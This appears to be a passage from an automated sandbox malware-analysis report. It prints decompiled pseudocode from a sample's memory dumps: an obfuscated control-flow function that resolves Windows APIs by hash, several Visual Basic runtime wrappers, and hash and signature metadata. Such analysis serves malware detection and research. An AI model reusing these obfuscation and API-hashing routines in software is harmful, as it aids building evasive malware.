														 *((intOrPtr*)(_t191 + 4)) =  *_v2856;
														_t270 = E02CC42F0(_t191,  *_v2856);
														 *_t191 = _t270;
														if(_t270 != 0) {
															_push( *((intOrPtr*)(_t191 + 4)));
															_push(_t270);
															_t189 = E02CC57E0(_v2852 - 4);
															_t280 = _t280 + 8;
															asm("sbb edi, edi");
															_v2888 =  ~_t263;
															if(0 == _t189) {
																E02CC4250(_t191,  *_t191);
															}
															_t263 = _v2884;
														}
														_t196 = _v2896;
														_t117 = 0xe50069;
														_t241 = _v2892;
														continue;
													}
												}
											}
										}
									}
								}
							}
							L71:
						}
						__eflags = _t117 - 0x2ec7d52f;
						if(__eflags > 0) {
							__eflags = _t117 - 0x310afd51;
							if(_t117 == 0x310afd51) {
								_v2828 = _t241;
								_v2820 = _t196;
								_v2824 = _t278;
								_t118 = E02CC1E60( &_v2828,  &_v2864);
								_t196 = _v2896;
								_t241 = _v2892;
								asm("sbb eax, eax");
								_t117 = ( ~_t118 & 0x1deeb958) + 0xc5127ed;
								goto L2;
							} else {
								__eflags = _t117 - 0x3380dca7;
								if(_t117 == 0x3380dca7) {
									_t121 = E02CC34C0(0x2ccd080);
									_t274 =  *0x2ccdc60;
									_t266 = _t121;
									__eflags = _t274;
									if(_t274 == 0) {
										_t274 = E02CC3E80(_t191, E02CC3F20(0xe66945e6), 0xcca28b0d, _t278);
										 *0x2ccdc60 = _t274;
									}
									_t243 =  *( *0x2cce2e0 + 0xc);
									 *_t274( &_v2816, 0x40, _t266, _t243[3] & 0x000000ff, _t243[2] & 0x000000ff, _t243[1] & 0x000000ff,  *_t243 & 0x000000ff);
									_t280 = _t280 + 0x1c;
									E02CC3460(_t266);
									_t196 = _v2896;
									_t263 = _v2884;
									_t241 = _v2892;
									_v2848 = ( *( *0x2cce2e0 + 0xc))[4] & 0x0000ffff;
									_t117 = 0x1194a5ec;
									goto L2;
								} else {
									__eflags = _t117 - 0x38f41d46;
									if(_t117 != 0x38f41d46) {
										goto L28;
									} else {
										_t276 =  *(_t263 + 4) + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5) * 4 + (0x51eb851f *  *(_t263 + 4) >> 0x20 >> 5);
										_t278 = E02CC42F0(_t191, _t276);
										_v2876 = _t278;
										__eflags = _t278;
										if(_t278 == 0) {
											goto L70;
										} else {
											_push(_t276);
											_push(_t278);
											_t196 = E02CC5BC0( *_t263,  *(_t263 + 4), _t278);
											_t280 = _t280 + 8;
											_v2896 = _t196;
											__eflags = _t196;
											if(_t196 == 0) {
												goto L69;
											} else {
												_t241 = _v2892;
												_t117 = 0x310afd51;
												goto L2;
											}
										}
									}
								}
							}
						} else {
							if(__eflags == 0) {
								_t139 =  *0x2ccdea8;
								__eflags = _t139;
								if(_t139 == 0) {
									_t139 = E02CC3E80(_t191, E02CC3F20(0xbb398380), 0x97f883e, _t278);
									 *0x2ccdea8 = _t139;
								}
								_t277 =  *_t139();
								_t141 =  *0x2cce1a0;
								__eflags = _t141;
								if(_t141 == 0) {
									_t141 = E02CC3E80(_t191, E02CC3F20(0xbb398380), 0x26c3f343, _t278);
									 *0x2cce1a0 = _t141;
								}
								 *_t141(_t277, 0, _v2872);
								_t196 = _v2908;
								_t117 = 0x2be07bd7;
								_t241 = _v2904;
								goto L2;
							} else {
								__eflags = _t117 - 0x2a3fe145;
								if(__eflags > 0) {
									__eflags = _t117 - 0x2be07bd7;
									if(_t117 != 0x2be07bd7) {
										goto L28;
									} else {
										E02CC4250(_t191, _v2836);
										_t196 = _v2896;
										_t117 = 0x1a712fee;
										_t241 = _v2892;
										goto L2;
									}
								} else {
									if(__eflags == 0) {
										_t146 = E02CC2290( &_v2864,  &_v2844);
										_t196 = _v2896;
										_t241 = _v2892;
										asm("sbb eax, eax");
										_t117 = ( ~_t146 & 0x28eb72d1) + 0xa9569d6;
										goto L2;
									} else {
										__eflags = _t117 - 0x26613761;
										if(_t117 == 0x26613761) {
											E02CC1C70( &_v2688);
											_t196 = _v2896;
											_t117 = 0x3354cb2;
											_t241 = _v2892;
											goto L2;
										} else {
											__eflags = _t117 - 0x26c62088;
											if(_t117 != 0x26c62088) {
												goto L28;
											} else {
												_push( &_v2872);
												_v2872 = 0;
												_push( &_v2836);
												_v2868 = 0;
												_push( &_v2048);
												_push( &_v2560);
												_t154 = E02CC2C20( &_v2816, _v2848);
												_t196 = _v2896;
												_t280 = _t280 + 0x10;
												_t241 = _v2892;
												asm("sbb eax, eax");
												_t117 = ( ~_t154 & 0xed66c663) + 0x2be07bd7;
												goto L2;
											}
										}
									}
								}
							}
						}
						goto L71;
						L28:
						__eflags = _t117 - 0x33f32524;
					} while (_t117 != 0x33f32524);
					return _v2888;
					goto L71;
				}
			}

0x02cc12b0
0x02cc12b8
0x02cc12c0
0x02cc12c2
0x02cc12c6
0x02cc12c8
0x02cc12cc
0x02cc12d0
0x02cc12d5
0x02cc12d9
0x02cc12dd
0x02cc12e1
0x02cc12e1
0x02cc12e1
0x02cc12e8
0x02cc12f0
0x02cc12f0
0x02cc12f0
0x02cc12f0
0x02cc12f5
0x00000000
0x00000000
0x02cc12fb
0x02cc1589
0x02cc158e
0x02cc1590
0x02cc15a3
0x02cc15a8
0x02cc15a8
0x02cc15af
0x02cc15b1
0x02cc15b6
0x02cc15b8
0x02cc15cb
0x02cc15d0
0x02cc15d0
0x02cc15dc
0x02cc15de
0x02cc15e2
0x02cc15e7
0x00000000
0x02cc1301
0x02cc1301
0x02cc1306
0x02cc148e
0x02cc1493
0x02cc1556
0x02cc155b
0x00000000
0x02cc1561
0x02cc1569
0x02cc156e
0x02cc1574
0x02cc1578
0x02cc157f
0x00000000
0x02cc157f
0x02cc1499
0x02cc1499
0x02cc14e6
0x02cc14fe
0x02cc14fe
0x02cc14ff
0x02cc1510
0x02cc151d
0x02cc1523
0x02cc1528
0x02cc152b
0x02cc152e
0x02cc1531
0x02cc1534
0x02cc1534
0x02cc1534
0x02cc1537
0x02cc153b
0x02cc153b
0x02cc153f
0x02cc1545
0x02cc1548
0x02cc154d
0x00000000
0x02cc149b
0x02cc149b
0x02cc14a0
0x02cc14cb
0x02cc14d0
0x02cc14d4
0x02cc14d9
0x00000000
0x02cc14a2
0x02cc14a2
0x02cc14a7
0x02cc1879
0x02cc187b
0x02cc1880
0x02cc188e
0x00000000
0x00000000
0x00000000
0x02cc14a7
0x02cc14a0
0x02cc1499
0x02cc130c
0x02cc130c
0x02cc1452
0x02cc1457
0x02cc1459
0x02cc146c
0x02cc1471
0x02cc1471
0x02cc1476
0x02cc1478
0x02cc147c
0x02cc1480
0x02cc1484
0x00000000
0x02cc1312
0x02cc1312
0x02cc1317
0x02cc1414
0x02cc1419
0x00000000
0x02cc141f
0x02cc142f
0x02cc1434
0x02cc1438
0x02cc143b
0x02cc1441
0x02cc1448
0x00000000
0x02cc1448
0x02cc131d
0x02cc131d
0x02cc13b5
0x02cc13b7
0x02cc13bc
0x02cc13be
0x02cc13d1
0x02cc13d6
0x02cc13d6
0x02cc13f6
0x02cc13f8
0x02cc13fd
0x02cc1402
0x02cc1406
0x02cc140b
0x00000000
0x02cc1323
0x02cc1328
0x02cc1394
0x02cc1399
0x02cc139d
0x02cc13a2
0x00000000
0x02cc132a
0x02cc132f
0x00000000
0x02cc1335
0x02cc133b
0x02cc1343
0x02cc1345
0x02cc1349
0x02cc1353
0x02cc135c
0x02cc135d
0x02cc1364
0x02cc1369
0x02cc136d
0x02cc1371
0x02cc1375
0x02cc1375
0x02cc137a
0x02cc137a
0x02cc137e
0x02cc1382
0x02cc1387
0x00000000
0x02cc1387
0x02cc132f
0x02cc1328
0x02cc131d
0x02cc1317
0x02cc130c
0x02cc1306
0x00000000
0x02cc12fb
0x02cc15f0
0x02cc15f5
0x02cc174c
0x02cc1751
0x02cc1845
0x02cc184d
0x02cc1855
0x02cc1859
0x02cc185e
0x02cc1864
0x02cc1868
0x02cc186f
0x00000000
0x02cc1757
0x02cc1757
0x02cc175c
0x02cc17c0
0x02cc17c5
0x02cc17cb
0x02cc17cd
0x02cc17cf
0x02cc17e7
0x02cc17e9
0x02cc17e9
0x02cc17f5
0x02cc1813
0x02cc1815
0x02cc181a
0x02cc1824
0x02cc1828
0x02cc182c
0x02cc1837
0x02cc183b
0x00000000
0x02cc175e
0x02cc175e
0x02cc1763
0x00000000
0x02cc1769
0x02cc1779
0x02cc1782
0x02cc1784
0x02cc1788
0x02cc178a
0x00000000
0x02cc1790
0x02cc1795
0x02cc1796
0x02cc179c
0x02cc179e
0x02cc17a1
0x02cc17a5
0x02cc17a7
0x00000000
0x02cc17ad
0x02cc17ad
0x02cc17b1
0x00000000
0x02cc17b1
0x02cc17a7
0x02cc178a
0x02cc1763
0x02cc175c
0x02cc15fb
0x02cc15fb
0x02cc16e5
0x02cc16ea
0x02cc16ec
0x02cc16ff
0x02cc1704
0x02cc1704
0x02cc170b
0x02cc170d
0x02cc1712
0x02cc1714
0x02cc1727
0x02cc172c
0x02cc172c
0x02cc1738
0x02cc173a
0x02cc173e
0x02cc1743
0x00000000
0x02cc1601
0x02cc1601
0x02cc1606
0x02cc16bf
0x02cc16c4
0x00000000
0x02cc16ca
0x02cc16ce
0x02cc16d3
0x02cc16d7
0x02cc16dc
0x00000000
0x02cc16dc
0x02cc160c
0x02cc160c
0x02cc169f
0x02cc16a4
0x02cc16aa
0x02cc16ae
0x02cc16b5
0x00000000
0x02cc1612
0x02cc1612
0x02cc1617
0x02cc1680
0x02cc1685
0x02cc1689
0x02cc168e
0x00000000
0x02cc1619
0x02cc1619
0x02cc161e
0x00000000
0x02cc1624
0x02cc162c
0x02cc1631
0x02cc1639
0x02cc1641
0x02cc1649
0x02cc1651
0x02cc1656
0x02cc165b
0x02cc165f
0x02cc1662
0x02cc1668
0x02cc166f
0x00000000
0x02cc166f
0x02cc161e
0x02cc1617
0x02cc160c
0x02cc1606
0x02cc15fb
0x00000000
0x02cc14ad
0x02cc14ad
0x02cc14ad
0x02cc14c6
0x00000000
0x02cc14c6

Strings

a7a&, xrefs: 02CC1548
Ei, xrefs: 02CC13C0
a7a&, xrefs: 02CC1612
E?*, xrefs: 02CC1601
Ei, xrefs: 02CC17D1

Memory Dump Source

Source File: 00000000.00000002.663798235.0000000002CC1000.00000020.00000001.sdmp, Offset: 02CC0000, based on PE: true

Associated: 00000000.00000002.663785696.0000000002CC0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663834676.0000000002CCD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.663856252.0000000002CCF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cc0000_boI88C399w.jbxd

Yara matches

Similarity

API ID:
String ID: E?*$a7a&$a7a&$Ei$Ei
API String ID: 0-288907479
Opcode ID: 2f26b3c3f6bdfd4f3d22a71a2b3f5dd154b64830dec82050fe4f50031f5bc591
Instruction ID: 368dbcf3ac2a334940a3260bf050eb78c0873fa24f87698c4132cbd067f70965
Opcode Fuzzy Hash: 2f26b3c3f6bdfd4f3d22a71a2b3f5dd154b64830dec82050fe4f50031f5bc591
Instruction Fuzzy Hash: BEE1D2716083418BC718DF6AD890A6FB3E6ABC4344F284D6DE84AD7345DB74ED05CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00461240, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,00401E96,?,?,?,?,0044E186,?), ref: 0046125E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,00401E96), ref: 0046128E
#579.MSVBVM60(?,?,?,?,?,00401E96), ref: 004612A1
#685.MSVBVM60(?,?,?,?,?,00401E96), ref: 004612B1
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,00401E96), ref: 004612BC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00409B70,0000001C), ref: 004612EF
__vbaFreeObj.MSVBVM60 ref: 00461316

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$#579#685CheckChkstkErrorFreeHresult
String ID:
API String ID: 491248741-0
Opcode ID: c1f4bda096b900588be577987fa82391f8e4a41b1fa6ef8025c65821a9c1db5e
Instruction ID: 2f0f95889624383d51f43ad3d67687f14fd67fa013ba05168bbdda6a80a62e98
Opcode Fuzzy Hash: c1f4bda096b900588be577987fa82391f8e4a41b1fa6ef8025c65821a9c1db5e
Instruction Fuzzy Hash: E1210EB5901208EFDB00DFE4DA49B9EBBB8FB08754F104519F502B76A0D7785A44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0360, Relevance: 9.2, APIs: 6, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMove
String ID:
API String ID: 1951056069-0
Opcode ID: b39d06836fe5e1206e4c95e4157a14693da382ad63a72a541a37cd5078fd0d35
Instruction ID: d1a0ec7e7b48f863213481d39af05c5d54648a3e5faf07f4ace43d786756c2b2
Opcode Fuzzy Hash: b39d06836fe5e1206e4c95e4157a14693da382ad63a72a541a37cd5078fd0d35
Instruction Fuzzy Hash: 1D5182B16043015FD721DF25D880B9BB7E9EFC8B54F10492DF949E7240E735E909CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 00469400, Relevance: 9.1, APIs: 6, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00469400(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v40;
				void* _t27;
				void* _t33;
				void* _t34;
				intOrPtr* _t36;
				intOrPtr* _t44;
				intOrPtr* _t48;
				signed int _t50;
				signed int _t51;
				intOrPtr* _t52;
				void* _t53;
				void* _t55;
				intOrPtr _t56;
				intOrPtr _t57;

				_t56 = _t55 - 0xc;
				 *[fs:0x0] = _t56;
				_t57 = _t56 - 0x34;
				_v16 = _t57;
				_v12 = 0x401d98;
				_t50 = _a4;
				_v8 = _t50 & 0x00000001;
				_t51 = _t50 & 0xfffffffe;
				_a4 = _t51;
				 *((intOrPtr*)( *_t51 + 4))(_t51, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t53);
				_t44 = _t57 - 0x10;
				 *_t44 = 3;
				_v28 = 0;
				 *((intOrPtr*)(_t44 + 4)) = _v40;
				 *((intOrPtr*)(_t44 + 8)) = 1;
				 *((intOrPtr*)(_t44 + 0xc)) = _v32;
				_t27 =  *((intOrPtr*)( *_t51 + 0x344))(_t51, 0xb);
				_t48 = __imp____vbaObjSet;
				__imp____vbaLateIdSt( *_t48( &_v28, _t27));
				_t36 = __imp____vbaFreeObj;
				 *_t36();
				_t52 =  *_t48( &_v28,  *((intOrPtr*)( *_t51 + 0x314))(_t51));
				_t33 =  *((intOrPtr*)( *_t52 + 0xe4))(_t52, 0xffffffff);
				asm("fclex");
				if(_t33 < 0) {
					__imp____vbaHresultCheckObj(_t33, _t52, 0x40a99c, 0xe4);
				}
				_t34 =  *_t36();
				_v8 = 0;
				_push(0x4694e4);
				return _t34;
			}

0x00469403
0x00469412
0x00469419
0x0046941f
0x00469422
0x00469429
0x00469431
0x00469434
0x00469438
0x0046943d
0x00469448
0x00469452
0x00469457
0x0046945e
0x00469463
0x00469469
0x0046946c
0x00469472
0x00469480
0x00469486
0x0046948f
0x004694a1
0x004694a8
0x004694b0
0x004694b2
0x004694c0
0x004694c0
0x004694c9
0x004694cb
0x004694d2
0x00000000

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0046947D
__vbaLateIdSt.MSVBVM60(00000000), ref: 00469480
__vbaFreeObj.MSVBVM60 ref: 0046948F
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0046949F
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040A99C,000000E4), ref: 004694C0
__vbaFreeObj.MSVBVM60 ref: 004694C9

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Free$CheckHresultLate
String ID:
API String ID: 2310700055-0
Opcode ID: 948c6a187b357c0ecd34348814ad2f103f30fb72b872da40342bcc32c503d9aa
Instruction ID: 2b7815cb191c6e000ed31cbf5219608b526392fbf23d672736d578dc3cabcbd1
Opcode Fuzzy Hash: 948c6a187b357c0ecd34348814ad2f103f30fb72b872da40342bcc32c503d9aa
Instruction Fuzzy Hash: 7C21517090020AEFD710DF68C945BAEBBB8FF48700F10866AF545A7291D7789941CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 004628B0, Relevance: 9.0, APIs: 6, Instructions: 39COMMON

Download Yara Rule

APIs

__vbaVarVargNofree.MSVBVM60(66109841,6610728D,00004004,?,?,?,?,?,?,?,00000000,00401E96,?), ref: 004628EF
__vbaVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 004628F6
__vbaVarVargNofree.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462904
__vbaVargVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462910
__vbaVargVarCopy.MSVBVM60(?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462917
__vbaFreeVar.MSVBVM60(00462928,?,?,?,?,?,?,?,00000000,00401E96,?), ref: 00462921

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$Varg$Copy$Nofree$Free
String ID:
API String ID: 4045588064-0
Opcode ID: 64c8177184eaccdb0ed31bb2a2ecf8d29a810ad1af8fbd513617b38e36b4dcab
Instruction ID: 031ed3128f6e56049944a270357a75ff3490f3b94bdd47c539ec9015f5556ae0
Opcode Fuzzy Hash: 64c8177184eaccdb0ed31bb2a2ecf8d29a810ad1af8fbd513617b38e36b4dcab
Instruction Fuzzy Hash: 19012175E10218ABCF04DFA4DD449DDBBB8FB4C700F104526E802B3364EB746905CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02CB0550, Relevance: 7.6, APIs: 5, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.663754872.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cb0000_boI88C399w.jbxd

Similarity

API ID: MemoryMove
String ID:
API String ID: 1951056069-0
Opcode ID: 7ed6cc83deef43c7acbca9d78813a0c0df2d7fe2cb5e53342ce8e64620e6dad7
Instruction ID: 1dcfe5512b788a0c733cd73505b531210b9fac4f67e772fe0b2d90a671b0ee07
Opcode Fuzzy Hash: 7ed6cc83deef43c7acbca9d78813a0c0df2d7fe2cb5e53342ce8e64620e6dad7
Instruction Fuzzy Hash: CE41C0B26043155BD721DE29C840BEBB7E9EFC4714F04492EF984E7240E735EA098BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0045F890, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0045F890(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr* _t31;
				void* _t35;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t52;
				signed int _t54;
				signed int _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t65;

				_t65 = __fp0;
				_t60 = _t59 - 0xc;
				 *[fs:0x0] = _t60;
				_v16 = _t60 - 0x2c;
				_v12 = 0x401a18;
				_t54 = _a4;
				_v8 = _t54 & 0x00000001;
				_t55 = _t54 & 0xfffffffe;
				_a4 = _t55;
				 *((intOrPtr*)( *_t55 + 4))(_t55, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t57);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				 *((intOrPtr*)( *_t55 + 0x334))(_t55);
				_t41 = __imp____vbaObjSet;
				_t31 =  *_t41( &_v32, 0);
				_t52 = _t31;
				_t56 =  *_t41( &_v28,  *((intOrPtr*)( *_t55 + 0x310))(_t55));
				_t35 =  *((intOrPtr*)( *_t56 + 0xb8))(_t56,  &_v36);
				asm("fclex");
				if(_t35 < 0) {
					__imp____vbaHresultCheckObj(_t35, _t56, 0x4098c8, 0xb8);
				}
				_v64 =  ~_v36;
				asm("fild dword [ebp-0x3c]");
				_v68 = _t65;
				_t39 =  *((intOrPtr*)( *_t52 + 0x74))(_t52, _v68);
				asm("fclex");
				if(_t39 < 0) {
					__imp____vbaHresultCheckObj(_t39, _t52, 0x40937c, 0x74);
				}
				__imp____vbaFreeObjList(2,  &_v28,  &_v32);
				_v8 = 0;
				asm("wait");
				_push(0x45f991);
				return _t39;
			}

0x0045f890
0x0045f893
0x0045f8a2
0x0045f8af
0x0045f8b2
0x0045f8b9
0x0045f8c1
0x0045f8c4
0x0045f8c8
0x0045f8cd
0x0045f8d5
0x0045f8d8
0x0045f8db
0x0045f8de
0x0045f8e4
0x0045f8ef
0x0045f8f4
0x0045f903
0x0045f90c
0x0045f914
0x0045f916
0x0045f924
0x0045f924
0x0045f934
0x0045f937
0x0045f93a
0x0045f942
0x0045f947
0x0045f949
0x0045f954
0x0045f954
0x0045f964
0x0045f96d
0x0045f974
0x0045f975
0x00000000

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045F8EF
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045F901
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098C8,000000B8), ref: 0045F924
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000074), ref: 0045F954
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0045F964

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList
String ID:
API String ID: 2772417511-0
Opcode ID: 7cf3918147f0aa26137efdadd129a1000baa47c73c152ceadb1c4f84e0f05253
Instruction ID: a86de2c82cfd8691c10ffcc757f022eaf981361409ea463c93c141813e8f69fc
Opcode Fuzzy Hash: 7cf3918147f0aa26137efdadd129a1000baa47c73c152ceadb1c4f84e0f05253
Instruction Fuzzy Hash: B7315A71900219EBCB00DFA4C989AAEBBBCFF48701F10812AF945E7291D77899458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0045F9B0, Relevance: 7.6, APIs: 5, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0045F9B0(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				signed int _v36;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr* _t31;
				void* _t35;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr* _t52;
				signed int _t54;
				signed int _t55;
				intOrPtr* _t56;
				void* _t57;
				void* _t59;
				intOrPtr _t60;
				intOrPtr _t65;

				_t65 = __fp0;
				_t60 = _t59 - 0xc;
				 *[fs:0x0] = _t60;
				_v16 = _t60 - 0x2c;
				_v12 = 0x401a28;
				_t54 = _a4;
				_v8 = _t54 & 0x00000001;
				_t55 = _t54 & 0xfffffffe;
				_a4 = _t55;
				 *((intOrPtr*)( *_t55 + 4))(_t55, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t57);
				_v28 = 0;
				_v32 = 0;
				_v36 = 0;
				 *((intOrPtr*)( *_t55 + 0x334))(_t55);
				_t41 = __imp____vbaObjSet;
				_t31 =  *_t41( &_v32, 0);
				_t52 = _t31;
				_t56 =  *_t41( &_v28,  *((intOrPtr*)( *_t55 + 0x30c))(_t55));
				_t35 =  *((intOrPtr*)( *_t56 + 0xb8))(_t56,  &_v36);
				asm("fclex");
				if(_t35 < 0) {
					__imp____vbaHresultCheckObj(_t35, _t56, 0x4098b8, 0xb8);
				}
				_v64 =  ~_v36;
				asm("fild dword [ebp-0x3c]");
				_v68 = _t65;
				_t39 =  *((intOrPtr*)( *_t52 + 0x7c))(_t52, _v68);
				asm("fclex");
				if(_t39 < 0) {
					__imp____vbaHresultCheckObj(_t39, _t52, 0x40937c, 0x7c);
				}
				__imp____vbaFreeObjList(2,  &_v28,  &_v32);
				_v8 = 0;
				asm("wait");
				_push(0x45fab1);
				return _t39;
			}

0x0045f9b0
0x0045f9b3
0x0045f9c2
0x0045f9cf
0x0045f9d2
0x0045f9d9
0x0045f9e1
0x0045f9e4
0x0045f9e8
0x0045f9ed
0x0045f9f5
0x0045f9f8
0x0045f9fb
0x0045f9fe
0x0045fa04
0x0045fa0f
0x0045fa14
0x0045fa23
0x0045fa2c
0x0045fa34
0x0045fa36
0x0045fa44
0x0045fa44
0x0045fa54
0x0045fa57
0x0045fa5a
0x0045fa62
0x0045fa67
0x0045fa69
0x0045fa74
0x0045fa74
0x0045fa84
0x0045fa8d
0x0045fa94
0x0045fa95
0x00000000

APIs

__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045FA0F
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401E96), ref: 0045FA21
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004098B8,000000B8), ref: 0045FA44
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000007C), ref: 0045FA74
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0045FA84

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckHresult$FreeList
String ID:
API String ID: 2772417511-0
Opcode ID: fb5c691f75b15feb2ccbf741d1f44a28753098d2d2750875f178abdc684f1894
Instruction ID: 91003739c3e9217360817e46dffd9687fbaf8044f25053dc135b5d5bf5dba4be
